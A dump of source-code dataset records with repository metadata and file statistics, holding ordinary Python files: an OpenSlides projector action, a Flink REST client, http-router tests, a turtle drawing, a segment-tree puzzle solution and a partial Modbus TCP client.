e6ceac497c37a1e3e7f408c6cfb29cf21d985b4c
|
[
"MIT"
] | 16
|
2020-01-04T20:28:57.000Z
|
2022-02-10T12:06:54.000Z
|
from typing import Any, Dict, List
from ....models.models import Projection, Projector
from ....permissions.permissions import Permissions
from ....shared.filters import And, FilterOperator
from ....shared.patterns import Collection, FullQualifiedId, string_to_fqid
from ....shared.schema import required_id_schema
from ...generics.update import UpdateAction
from ...util.assert_belongs_to_meeting import assert_belongs_to_meeting
from ...util.default_schema import DefaultSchema
from ...util.register import register_action
from ...util.typing import ActionData
from ..projection.create import ProjectionCreate
from ..projection.delete import ProjectionDelete
from ..projection.update import ProjectionUpdate
@register_action("projector.toggle")
class ProjectorToggle(UpdateAction):
"""
Action to toggle projections.
"""
model = Projector()
schema = DefaultSchema(Projection()).get_default_schema(
title="Projector toggle stable schema",
required_properties=["content_object_id", "meeting_id"],
optional_properties=["options", "type", "stable"],
additional_required_fields={
"ids": {
"type": "array",
"items": required_id_schema,
"uniqueItems": True,
"minItems": 1,
},
},
)
permission = Permissions.Projector.CAN_MANAGE
def get_updated_instances(self, action_data: ActionData) -> ActionData:
for instance in action_data:
# check meeting ids from projector ids and content_object
meeting_id = instance["meeting_id"]
fqid_content_object = string_to_fqid(instance["content_object_id"])
assert_belongs_to_meeting(
self.datastore,
[fqid_content_object]
+ [
FullQualifiedId(Collection("projector"), id)
for id in instance["ids"]
],
meeting_id,
)
for projector_id in instance["ids"]:
stable = instance.get("stable", False)
filter_ = And(
FilterOperator("current_projector_id", "=", projector_id),
FilterOperator(
"content_object_id", "=", instance["content_object_id"]
),
FilterOperator("stable", "=", stable),
)
if instance.get("type"):
filter_ = And(
filter_, FilterOperator("type", "=", instance["type"])
)
result = self.datastore.filter(
Collection("projection"), filter_, ["id"]
)
if result:
projection_ids = [id_ for id_ in result]
if stable:
self.execute_other_action(
ProjectionDelete, [{"id": id_} for id_ in projection_ids]
)
else:
self.move_projections_to_history(projector_id, projection_ids)
else:
data: Dict[str, Any] = {
"current_projector_id": projector_id,
"stable": stable,
"type": instance.get("type"),
"content_object_id": instance["content_object_id"],
"options": instance.get("options"),
"meeting_id": meeting_id,
}
if not stable:
self.move_all_unstable_projections_to_history(
projector_id, meeting_id
)
yield {"id": projector_id, "scroll": 0}
self.execute_other_action(ProjectionCreate, [data])
def move_projections_to_history(
self, projector_id: int, projection_ids: List[int]
) -> None:
max_weight = self.get_max_projection_weight(projector_id)
for projection_id in projection_ids:
self.execute_other_action(
ProjectionUpdate,
[
{
"id": int(projection_id),
"current_projector_id": None,
"history_projector_id": projector_id,
"weight": max_weight + 1,
}
],
)
max_weight += 1
def get_max_projection_weight(self, projector_id: int) -> int:
filter_ = FilterOperator("history_projector_id", "=", projector_id)
maximum = self.datastore.max(Collection("projection"), filter_, "weight", "int")
if maximum is None:
maximum = 0
return maximum
def move_all_unstable_projections_to_history(
self, projector_id: int, meeting_id: int
) -> None:
filter_ = And(
FilterOperator("meeting_id", "=", meeting_id),
FilterOperator("current_projector_id", "=", projector_id),
FilterOperator("stable", "=", False),
)
result = self.datastore.filter(Collection("projection"), filter_, ["id"])
if result:
self.move_projections_to_history(projector_id, [int(id_) for id_ in result])
| 40.763359
| 88
| 0.548876
| 481
| 5,340
| 5.804574
| 0.2079
| 0.082736
| 0.032235
| 0.039398
| 0.230659
| 0.184814
| 0.166905
| 0.043696
| 0.043696
| 0.043696
| 0
| 0.001454
| 0.35618
| 5,340
| 130
| 89
| 41.076923
| 0.810646
| 0.016105
| 0
| 0.128205
| 0
| 0
| 0.096029
| 0
| 0
| 0
| 0
| 0
| 0.017094
| 1
| 0.034188
| false
| 0
| 0.119658
| 0
| 0.196581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9c3d07f73748d2980ffa18343832a605023692e
| 3,235
|
py
|
Python
|
sfftk_migrate/__init__.py
|
emdb-empiar/sfftk-migrate
|
fc8941082256456edb61fe22ecbf932f6258352a
|
[
"Apache-2.0"
] | null | null | null |
sfftk_migrate/__init__.py
|
emdb-empiar/sfftk-migrate
|
fc8941082256456edb61fe22ecbf932f6258352a
|
[
"Apache-2.0"
] | 2
|
2020-04-02T15:25:10.000Z
|
2020-04-03T14:32:12.000Z
|
sfftk_migrate/__init__.py
|
emdb-empiar/sfftk-migrate
|
fc8941082256456edb61fe22ecbf932f6258352a
|
[
"Apache-2.0"
] | null | null | null |
"""
sfftk-migrate
==============
This is a simple tool to allow users to easily migrate older versions of EMDB-SFF files to the latest (supported version).
It has only one dependency: `lxml` which effects part of the migrations.
Presently it only works with XML (.sff) EMDB-SFF files.
How does it work?
-----------------
Each migration consists of two components:
1. a Python module which implements a `migrate` function, and
2. an XSL stylesheet which defines how the `source` is transformed into the `target`
The `migrate` function in (1) has the following signature:
.. code-block:: python
def migrate(infile, outfile, stylesheet, args, encoding='utf-8', **params):
...
where `infile` and `outfile` are the names of the source and target files, `stylesheet` is the
XSL file, `args` is the argument namespace, `encoding` defines what encoding the outfile will
be writing in, and `**params` is a dictionary of any params specified in the XSL file.
Please reference https://www.w3schools.com/xml/xsl_intro.asp on how XSL works.
Migrations are effected using the `migrate.do_migration` function which has the following signature:
.. code-block:: python
def do_migration(args, value_list=None, version_list=VERSION_LIST):
...
Lessons learned in using `lxml`
---------------------------------
* etree.parse() takes XML files/file objects and returns an ElementTree
* etree.XML() takes a string and returns an Element regardless of the content
* etree.ElementTree(root_element) converts an element into an ElementTree
* etree.XSLT() takes an ElementTree or Element object and returns a transformer object;
a transformer object should take an ElementTree (but seems to also take Element objects)
* the result of a transformation is an _XSLTResultTree which behaves like an ElementTree but submits to str()
from: https://lxml.de/xpathxslt.html#xslt-result-objects
It is possible to pass parameters, in the form of XPath expressions, to the XSLT template:
>>> xslt_tree = etree.XML('''\
... <xsl:stylesheet version="1.0"
... xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
... <xsl:param name="a" />
... <xsl:template match="/">
... <foo><xsl:value-of select="$a" /></foo>
... </xsl:template>
... </xsl:stylesheet>''')
>>> transform = etree.XSLT(xslt_tree)
>>> doc_root = etree.XML('<a><b>Text</b></a>')
The parameters are passed as keyword parameters to the transform call. First, let's try passing in a simple integer expression:
>>> result = transform(doc_root, a="5")
>>> str(result)
'<?xml version="1.0"?>\n<foo>5</foo>\n'
"""
import os
SFFTK_MIGRATIONS_VERSION = '0.1.0b7'
VERSION_LIST = [
'0.7.0.dev0',
'0.8.0.dev1'
]
TEST_DATA_PATH = os.path.join(os.path.dirname(__file__))
XSL = os.path.join(TEST_DATA_PATH, 'data', 'xsl')
XML = os.path.join(TEST_DATA_PATH, 'data', 'xml')
MIGRATIONS_PACKAGE = 'sfftk_migrate.migrations'
STYLESHEETS_DIR = os.path.join(os.path.dirname(__file__), 'stylesheets')
ENDIANNESS = {
"little": "<",
"big": ">",
}
MODE = {
"int8": "b",
"uint8": "B",
"int16": "h",
"uint16": "H",
"int32": "i",
"uint32": "I",
"int64": "q",
"uint64": "Q",
"float32": "f",
"float64": "d"
}
| 29.678899
| 127
| 0.678825
| 471
| 3,235
| 4.59448
| 0.428875
| 0.016636
| 0.018484
| 0.022181
| 0.0878
| 0.0878
| 0.0878
| 0.038817
| 0
| 0
| 0
| 0.017037
| 0.165379
| 3,235
| 108
| 128
| 29.953704
| 0.784444
| 0.799691
| 0
| 0
| 0
| 0
| 0.241706
| 0.037915
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.037037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9c9d816a148fcaa90837526278207a3fb99ed20
| 802
|
py
|
Python
|
RTplzrunBlog/ThisandThat/1168.py
|
lkc263/Algorithm_Study_Python
|
5b9a74ecf7e864c861df2280a1bf4b393b0fcbca
|
[
"MIT"
] | null | null | null |
RTplzrunBlog/ThisandThat/1168.py
|
lkc263/Algorithm_Study_Python
|
5b9a74ecf7e864c861df2280a1bf4b393b0fcbca
|
[
"MIT"
] | null | null | null |
RTplzrunBlog/ThisandThat/1168.py
|
lkc263/Algorithm_Study_Python
|
5b9a74ecf7e864c861df2280a1bf4b393b0fcbca
|
[
"MIT"
] | null | null | null |
from sys import stdin as s
n, k = map(int, s.readline().split())
tree = [0] * 400005
def init(node, s, e):
if s == e:
tree[node] = 1
return tree[node]
mid = (s + e) >> 1
tree[node] = init(2 * node, s, mid) + init(2 * node + 1, mid + 1, e)
return tree[node]
def query(node, s, e, k):
tree[node] -= 1
if s == e:
return s
mid = (s + e) >> 1
if tree[2 * node] >= k:
return query(2 * node, s, mid, k)
else:
return query(2 * node + 1, mid + 1, e, k - tree[2 * node])
init(1, 1, n)
x = k
print("<", end="")
for idx in range(0, n - 1):
print("%d, " % query(1, 1, n, x), end="")
x += k - 1
if x % tree[1] == 0:
x = tree[1]
else:
x %= tree[1]
print("%d" % query(1, 1, n, x), end="")
print(">")
| 19.095238
| 72
| 0.451372
| 141
| 802
| 2.567376
| 0.241135
| 0.033149
| 0.024862
| 0.033149
| 0.165746
| 0.165746
| 0.104972
| 0.104972
| 0.104972
| 0
| 0
| 0.064151
| 0.339152
| 802
| 41
| 73
| 19.560976
| 0.618868
| 0
| 0
| 0.258065
| 0
| 0
| 0.009975
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.032258
| 0
| 0.258065
| 0.129032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9d6bbb09e450702b15b4ceb0a5be3a4e585501e
| 7,237
|
py
|
Python
|
flink_rest_client/v1/jars.py
|
frego-dev/flink-rest-client
|
e63e3bc4e6ec73a1a86adb3bfbc011087a5248bd
|
[
"MIT"
] | null | null | null |
flink_rest_client/v1/jars.py
|
frego-dev/flink-rest-client
|
e63e3bc4e6ec73a1a86adb3bfbc011087a5248bd
|
[
"MIT"
] | null | null | null |
flink_rest_client/v1/jars.py
|
frego-dev/flink-rest-client
|
e63e3bc4e6ec73a1a86adb3bfbc011087a5248bd
|
[
"MIT"
] | null | null | null |
import ntpath
import os
from flink_rest_client.common import _execute_rest_request, RestException
class JarsClient:
def __init__(self, prefix):
"""
Constructor.
Parameters
----------
prefix: str
REST API url prefix. It must contain the host, port pair.
"""
self.prefix = f"{prefix}/jars"
def all(self):
"""
Returns a list of all jars previously uploaded via '/jars/upload'.
Endpoint: [GET] /jars
Returns
-------
dict
List all the jars were previously uploaded.
"""
return _execute_rest_request(url=self.prefix)
def upload(self, path_to_jar):
"""
Uploads a jar to the cluster from the input path. The jar's name will be the original filename from the input
path.
Endpoint: [POST] /jars/upload
Parameters
----------
path_to_jar: str
Path to the jar file.
Returns
-------
dict
Result of jar upload.
"""
filename = os.path.basename(path_to_jar)
files = {
"file": (filename, (open(path_to_jar, "rb")), "application/x-java-archive")
}
return _execute_rest_request(
url=f"{self.prefix}/upload", http_method="POST", files=files
)
def get_plan(self, jar_id):
"""
Returns the dataflow plan of a job contained in a jar previously uploaded via '/jars/upload'.
Endpoint: [POST] /jars/:jarid/plan
Parameters
----------
jar_id: str
String value that identifies a jar. When uploading the jar a path is returned, where the filename is the ID.
This value is equivalent to the `id` field in the list of uploaded jars.xe
Returns
-------
dict
Details of the jar_id's plan.
Raises
------
RestException
If the jar_id does not exist.
"""
return _execute_rest_request(
url=f"{self.prefix}/{jar_id}/plan", http_method="POST"
)["plan"]
def run(
self,
jar_id,
arguments=None,
entry_class=None,
parallelism=None,
savepoint_path=None,
allow_non_restored_state=None,
):
"""
Submits a job by running a jar previously uploaded via '/jars/upload'.
Endpoint: [POST] /jars/:jarid/run
Parameters
----------
jar_id: str
String value that identifies a jar. When uploading the jar a path is returned, where the filename is the ID.
This value is equivalent to the `id` field in the list of uploaded jars.
arguments: dict
(Optional) Dict of program arguments.
entry_class: str
(Optional) String value that specifies the fully qualified name of the entry point class. Overrides the
class defined in the jar file manifest.
parallelism: int
(Optional) Positive integer value that specifies the desired parallelism for the job.
savepoint_path: str
(Optional) String value that specifies the path of the savepoint to restore the job from.
allow_non_restored_state: bool
(Optional) Boolean value that specifies whether the job submission should be rejected if the savepoint
contains state that cannot be mapped back to the job.
Returns
-------
str
32-character hexadecimal string value that identifies a job.
Raises
------
RestException
If the jar_id does not exist.
"""
data = {}
if arguments is not None:
data["programArgs"] = " ".join([f"--{k} {v}" for k, v in arguments.items()])
if entry_class is not None:
data["entry-class"] = entry_class
if parallelism is not None:
if parallelism < 0:
raise RestException(
"get_plan method's parallelism parameter must be a positive integer."
)
data["parallelism"] = parallelism
if savepoint_path is not None:
data["savepointPath"] = savepoint_path
if allow_non_restored_state is not None:
data["allowNonRestoredState"] = allow_non_restored_state
return _execute_rest_request(
url=f"{self.prefix}/{jar_id}/run", http_method="POST", json=data
)["jobid"]
def upload_and_run(
self,
path_to_jar,
arguments=None,
entry_class=None,
parallelism=None,
savepoint_path=None,
allow_non_restored_state=None,
):
"""
Helper method to upload and start a jar in one method call.
Parameters
----------
path_to_jar: str
Path to the jar file.
arguments: dict
(Optional) Comma-separated list of program arguments.
entry_class: str
(Optional) String value that specifies the fully qualified name of the entry point class. Overrides the
class defined in the jar file manifest.
parallelism: int
(Optional) Positive integer value that specifies the desired parallelism for the job.
savepoint_path: str
(Optional) String value that specifies the path of the savepoint to restore the job from.
allow_non_restored_state: bool
(Optional) Boolean value that specifies whether the job submission should be rejected if the savepoint
contains state that cannot be mapped back to the job.
Returns
-------
str
32-character hexadecimal string value that identifies a job.
Raises
------
RestException
If an error occurred during the upload of jar file.
"""
result = self.upload(path_to_jar=path_to_jar)
if not result["status"] == "success":
raise RestException("Could not upload the input jar file.", result)
return self.run(
ntpath.basename(result["filename"]),
arguments=arguments,
entry_class=entry_class,
parallelism=parallelism,
savepoint_path=savepoint_path,
allow_non_restored_state=allow_non_restored_state,
)
def delete(self, jar_id):
"""
Deletes a jar previously uploaded via '/jars/upload'.
Endpoint: [DELETE] /jars/:jarid
Parameters
----------
jar_id: str
String value that identifies a jar. When uploading the jar a path is returned, where the filename is the ID.
This value is equivalent to the `id` field in the list of uploaded jars.
Returns
-------
bool
True, if jar_id has been successfully deleted, otherwise False.
Raises
------
RestException
If the jar_id does not exist.
"""
res = _execute_rest_request(url=f"{self.prefix}/{jar_id}", http_method="DELETE")
if len(res.keys()) < 1:
return True
else:
return False
| 30.92735
| 120
| 0.579107
| 853
| 7,237
| 4.793669
| 0.208675
| 0.017119
| 0.033015
| 0.041086
| 0.567865
| 0.561262
| 0.551724
| 0.551724
| 0.531915
| 0.497921
| 0
| 0.001257
| 0.340473
| 7,237
| 233
| 121
| 31.060086
| 0.855437
| 0.493298
| 0
| 0.232877
| 0
| 0
| 0.134848
| 0.044705
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09589
| false
| 0
| 0.041096
| 0
| 0.246575
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9da4c23e10982ade2cffc9ff31b496b0afdcefd
| 2,320
|
py
|
Python
|
kovalenko1.py
|
Maxim-Kovalenko/turtle-graphics-programms
|
768866f9b6658dc0933b0391387a6bdec64ad6ec
|
[
"Apache-2.0"
] | 1
|
2020-04-14T08:31:24.000Z
|
2020-04-14T08:31:24.000Z
|
kovalenko1.py
|
Maxim-Kovalenko/turtle-graphics-programms
|
768866f9b6658dc0933b0391387a6bdec64ad6ec
|
[
"Apache-2.0"
] | null | null | null |
kovalenko1.py
|
Maxim-Kovalenko/turtle-graphics-programms
|
768866f9b6658dc0933b0391387a6bdec64ad6ec
|
[
"Apache-2.0"
] | 1
|
2021-01-05T15:47:59.000Z
|
2021-01-05T15:47:59.000Z
|
from turtle import *
from random import *
# from random import *
def move(x, y):
penup()
goto(x, y)
pendown()
def fillpolygon(side, count, color1, color2):
pencolor(color2)
fillcolor(color1)
begin_fill()
for i in range(count):
forward(side)
left(360 / count)
end_fill()
def christmas_tree(size, xStart, yStart):
move(xStart, yStart)
fillpolygon(size, 4, "brown", "black")
left(90)
forward(size)
right(90)
backward(size)
for g in range(2):
fillpolygon(size * 3, 3, "lightgreen", "green")
left(60)
forward(size * 2)
right(60)
backward(size)
fillpolygon(size * 3, 3, "lightgreen", "green")
'''left(60)
forward(size*3)
right(60)
backward(size/4)
fillpolygon(size/2, 5, "orange", "darkorange")'''
def treesLine(side, minX, y, count, distBetw):
for counter in range(count):
x = minX + distBetw * counter
christmas_tree(side, x, y)
def star(side, mainColor, fillColor, x, y):
move(x, y)
pencolor(mainColor)
fillcolor(fillColor)
begin_fill()
left(107)
for count in range(5):
forward(side)
left(144)
penup()
right(107)
end_fill()
def starLine(side, minX, y, count, distBetw):
for counter in range(count):
x = minX + distBetw * counter
star(side, "yellow", "yellow", x, y)
def moon(radius, color, minX, minY, maxX, maxY):
x = randint(minX, maxX)
y = randint(minY, maxY)
move(x, y)
dot(radius, color)
def frame(x1, y1, x2, y2, color):
pensize(10)
pencolor(color)
move(x1, y1)
goto(x1, y2)
goto(x2, y2)
goto(x2, y1)
goto(x1, y1)
'''def writeline(line, color):
pencolor(color)
left(90)
penup()
forward(55)
left(90)
forward(30)
write(line)'''
bgcolor("gray")
speed(0)
moon(200, "white", -925, 300, 900, 400)
frame(-950, -490, 950, 500, "darkorange")
pensize(3)
starLine(40, -900, 450, 15, 120)
starLine(40, -900, 380, 13, 150)
starLine(40, -900, 300, 15, 120)
treesLine(20, -900, 100, 23, 80)
treesLine(20, -700, -100, 18, 80)
treesLine(20, -900, -300, 23, 80)
#'''
writeline("Merry Christmas!", "darkblue")
| 21.886792
| 56
| 0.563793
| 305
| 2,320
| 4.268852
| 0.347541
| 0.010753
| 0.013825
| 0.033794
| 0.173579
| 0.173579
| 0.173579
| 0.173579
| 0.173579
| 0.173579
| 0
| 0.101511
| 0.286638
| 2,320
| 105
| 57
| 22.095238
| 0.685196
| 0.009914
| 0
| 0.246575
| 0
| 0
| 0.049223
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.109589
| false
| 0
| 0.027397
| 0
| 0.136986
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9db9333dcabf339b75e8e3dafb52fedc14104d7
| 9,713
|
py
|
Python
|
tests.py
|
klen/http-router
|
b571aed91200e9d57da4d2136d7e1a5312ef6c4e
|
[
"MIT"
] | 11
|
2020-11-10T15:12:58.000Z
|
2022-01-24T13:14:53.000Z
|
tests.py
|
klen/http-router
|
b571aed91200e9d57da4d2136d7e1a5312ef6c4e
|
[
"MIT"
] | 2
|
2021-05-01T13:59:14.000Z
|
2022-03-09T20:45:02.000Z
|
tests.py
|
klen/http-router
|
b571aed91200e9d57da4d2136d7e1a5312ef6c4e
|
[
"MIT"
] | null | null | null |
"""HTTP Router tests."""
import inspect
import typing as t
from re import compile as re
import pytest
@pytest.fixture
def router():
from http_router import Router, NotFound, MethodNotAllowed, RouterError # noqa
return Router()
def test_router_basic(router):
assert router
assert not router.trim_last_slash
assert router.validator
assert router.NotFound
assert router.RouterError
assert router.MethodNotAllowed
router.trim_last_slash = True
assert router.trim_last_slash
def test_router_route_re(router):
router.route(re('test.jpg'))('test1 passed')
assert router('test.jpg').target == 'test1 passed'
assert router('testAjpg').target == 'test1 passed'
assert router('testAjpg/regex/can/be/dangerous').target == 'test1 passed'
router.route(re(r'params/(\w+)'))('test2 passed')
match = router('params/mike')
assert match
assert not match.params
router.route(re(r'params2/(?P<User>\w+)'))('test3 passed')
match = router('params2/mike')
assert match
assert match.params == {'User': 'mike'}
def test_router_route_str(router):
router.route('test.jpg')(True)
match = router('test.jpg')
assert match
with pytest.raises(router.NotFound):
router('test.jpeg')
router.route('/any/{item}')(True)
match = router('/any/test')
assert match
assert match.params == {'item': 'test'}
router.route('/str/{item:str}')(True)
match = router('/str/42')
assert match
assert match.params == {'item': '42'}
router.route('/int/{item:int}')(True)
match = router('/int/42')
assert match
assert match.params == {'item': 42}
router.route(r'/regex/{item:\d{3}}')(True)
match = router('/regex/422')
assert match
assert match.params == {'item': '422'}
def test_parse_path():
from http_router.utils import parse_path
assert parse_path('/') == ('/', None, {})
assert parse_path('/test.jpg') == ('/test.jpg', None, {})
assert parse_path('/{foo') == ('/{foo', None, {})
path, regex, params = parse_path(r'/{foo}/')
assert isinstance(regex, t.Pattern)
assert regex.pattern == r'^/(?P<foo>[^/]+)/$'
assert path == '/{foo}/'
assert params == {'foo': str}
path, regex, params = parse_path(r'/{foo:int}/')
assert isinstance(regex, t.Pattern)
assert regex.pattern == r'^/(?P<foo>\d+)/$'
assert path == '/{foo}/'
assert params == {'foo': int}
path, regex, params = parse_path(re(r'/(?P<foo>\d{1,3})/'))
assert isinstance(regex, t.Pattern)
assert params == {}
assert path
path, regex, params = parse_path(r'/api/v1/items/{item:str}/subitems/{ subitem:\d{3} }/find')
assert path == '/api/v1/items/{item}/subitems/{subitem}/find'
assert regex.match('/api/v1/items/foo/subitems/300/find')
assert params['item']
assert params['subitem']
def test_route():
from http_router.routes import Route
route = Route('/only-post', {'POST'}, None)
assert route.methods
assert route.match('/only-post', 'POST')
assert not route.match('/only-post', '')
route = Route('/only-post', set(), None)
assert not route.methods
def test_dynamic_route():
from http_router.routes import DynamicRoute
route = DynamicRoute(r'/order/{id:int}', set(), None)
match = route.match('/order/100', '')
assert match
assert match.params == {'id': 100}
match = route.match('/order/unknown', '')
assert not match
assert not match.params
route = DynamicRoute(re('/regex(/opt)?'), set(), None)
match = route.match('/regex', '')
assert match
match = route.match('/regex/opt', '')
assert match
def test_router():
"""Base tests."""
from http_router import Router
router = Router(trim_last_slash=True)
with pytest.raises(router.RouterError):
router.route(lambda: 12)
with pytest.raises(router.NotFound):
assert router('/unknown')
router.route('/', '/simple')('simple')
match = router('/', 'POST')
assert match.target == 'simple'
assert not match.params
match = router('/simple', 'DELETE')
assert match.target == 'simple'
assert not match.params
router.route('/only-post', methods='post')('only-post')
assert router.plain['/only-post'][0].methods == {'POST'}
with pytest.raises(router.MethodNotAllowed):
assert router('/only-post')
match = router('/only-post', 'POST')
assert match.target == 'only-post'
assert not match.params
router.route('/dynamic1/{id}')('dyn1')
router.route('/dynamic2/{ id }')('dyn2')
match = router('/dynamic1/11/')
assert match.target == 'dyn1'
assert match.params == {'id': '11'}
match = router('/dynamic2/22/')
assert match.target == 'dyn2'
assert match.params == {'id': '22'}
@router.route(r'/hello/{name:str}', methods='post')
def hello():
return 'hello'
match = router('/hello/john/', 'POST')
assert match.target() == 'hello'
assert match.params == {'name': 'john'}
@router.route('/params', var='value')
def params(**opts):
return opts
match = router('/params', 'POST')
assert match.target() == {'var': 'value'}
assert router.routes()
assert router.routes()[0].path == ''
def test_mounts():
from http_router import Router
from http_router.routes import Mount
router = Router()
route = Mount('/api/', set(), router)
assert route.path == '/api'
match = route.match('/api/e1', '')
assert not match
router.route('/e1')('e1')
match = route.match('/api/e1', 'UNKNOWN')
assert match
assert match.target == 'e1'
root = Router()
subrouter = Router()
root.route('/api')(1)
root.route(re('/api/test'))(2)
root.route('/api')(subrouter)
subrouter.route('/test')(3)
assert root('/api').target == 1
assert root('/api/test').target == 3
def test_trim_last_slash():
from http_router import Router
router = Router()
router.route('/route1')('route1')
router.route('/route2/')('route2')
assert router('/route1').target == 'route1'
assert router('/route2/').target == 'route2'
with pytest.raises(router.NotFound):
assert not router('/route1/')
with pytest.raises(router.NotFound):
assert not router('/route2')
router = Router(trim_last_slash=True)
router.route('/route1')('route1')
router.route('/route2/')('route2')
assert router('/route1').target == 'route1'
assert router('/route2/').target == 'route2'
assert router('/route1/').target == 'route1'
assert router('/route2').target == 'route2'
def test_validator():
from http_router import Router
# The router only accepts async functions
router = Router(validator=inspect.iscoroutinefunction)
with pytest.raises(router.RouterError):
router.route('/', '/simple')(lambda: 'simple')
def test_converter():
from http_router import Router
# The router only accepts async functions
router = Router(converter=lambda v: lambda r: (r, v))
router.route('/')('simple')
match = router('/')
assert match.target('test') == ('test', 'simple')
def test_custom_route():
from http_router import Router
class View:
methods = 'get', 'post'
def __new__(cls, *args, **kwargs):
"""Init the class and call it."""
self = super().__new__(cls)
return self(*args, **kwargs)
@classmethod
def __route__(cls, router, *paths, **params):
return router.bind(cls, *paths, methods=cls.methods)
# The router only accepts async functions
router = Router()
router.route('/')(View)
assert router.plain['/'][0].methods == {'GET', 'POST'}
match = router('/')
assert match.target is View
def test_nested_routers():
from http_router import Router
child = Router()
child.route('/url', methods='PATCH')('child_url')
match = child('/url', 'PATCH')
assert match.target == 'child_url'
root = Router()
root.route('/child')(child)
with pytest.raises(root.NotFound):
root('/child')
with pytest.raises(root.NotFound):
root('/child/unknown')
with pytest.raises(root.MethodNotAllowed):
root('/child/url')
match = root('/child/url', 'PATCH')
assert match.target == 'child_url'
def test_readme():
from http_router import Router
router = Router(trim_last_slash=True)
@router.route('/simple')
def simple():
return 'simple'
match = router('/simple')
assert match.target() == 'simple'
assert match.params is None
def test_method_shortcuts(router):
router.delete('/delete')('DELETE')
router.get('/get')('GET')
router.post('/post')('POST')
for route in router.routes():
method = route.target
assert route.methods == {method}
def test_benchmark(router, benchmark):
import random
import string
CHARS = string.ascii_letters + string.digits
RANDOM = lambda: ''.join(random.choices(CHARS, k=10)) # noqa
METHODS = 'GET', 'POST'
routes = [f"/{ RANDOM() }/{ RANDOM() }" for _ in range(100)]
routes += [f"/{ RANDOM() }/{{item}}/{ RANDOM() }" for _ in range(100)]
random.shuffle(routes)
paths = []
for route in routes:
router.route(route, methods=random.choice(METHODS))('OK')
paths.append(route.format(item=RANDOM()))
paths = [route.format(item=RANDOM()) for route in routes]
def do_work():
for path in paths:
try:
assert router(path)
except router.MethodNotAllowed:
pass
benchmark(do_work)
| 25.901333
| 97
| 0.616596
| 1,190
| 9,713
| 4.964706
| 0.143697
| 0.063304
| 0.030806
| 0.030467
| 0.380501
| 0.29587
| 0.223934
| 0.193128
| 0.122546
| 0.122546
| 0
| 0.012941
| 0.212396
| 9,713
| 374
| 98
| 25.970588
| 0.759346
| 0.019458
| 0
| 0.237354
| 0
| 0.003891
| 0.158039
| 0.017466
| 0
| 0
| 0
| 0
| 0.357977
| 1
| 0.089494
| false
| 0.027237
| 0.07393
| 0.015564
| 0.194553
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9e0012334031a979e4c8078a3fc972d1c90c1a0
| 5,192
|
py
|
Python
|
speaker/adam.py
|
shannon-jia/speaker
|
31c642f018725dd4878ef6a4e7a19b12b05774c8
|
[
"MIT"
] | null | null | null |
speaker/adam.py
|
shannon-jia/speaker
|
31c642f018725dd4878ef6a4e7a19b12b05774c8
|
[
"MIT"
] | null | null | null |
speaker/adam.py
|
shannon-jia/speaker
|
31c642f018725dd4878ef6a4e7a19b12b05774c8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# _*_ coding: utf-8 _*_
import asyncio
import logging
import struct
log = logging.getLogger(__name__)
class TcpClientProtocol(asyncio.Protocol):
def __init__(self, master):
self.master = master
def connection_made(self, transport):
self.transport = transport
self.master.connected = True
def data_received(self, data):
log.info('Data received: {!r}'.format(data))
def connection_lost(self, exc):
log.error('The server closed the connection')
self.master.connected = None
class Adam(object):
HEAD = b'\x00\x00\x00\x00\x00\x06'
def __init__(self, loop, host, port=502):
self.station_address = 1
self.function_code = 5
self.coil_address = 0x10
self.send_str = b''
self.loop = loop or asyncio.get_event_loop()
self.host = host
self.port = port
self.connected = None
self.loop.create_task(self._do_connect())
self.transport = None
self.coils_state = 0
self.transaction_id = 0
self.protocol_id = 0
# self.loop.call_later(6, self.keepAlive)
async def _do_connect(self):
while True:
await asyncio.sleep(5)
if self.connected:
continue
try:
xt, _ = await self.loop.create_connection(
lambda: TcpClientProtocol(self),
self.host,
self.port)
log.info('Connection create on {}'.format(xt))
self.transport = xt
self.connected = True
self.read_coils_status()
# self.login()
except OSError:
log.error('Server not up retrying in 5 seconds...')
except Exception as e:
log.error('Error when connect to server: {}'.format(e))
def _command_head(self, length):
self.transaction_id += 1
s = struct.Struct('>HHH')
values = (self.transaction_id,
self.protocol_id,
length)
return s.pack(*values)
# function code is 1
def read_coils_status(self):
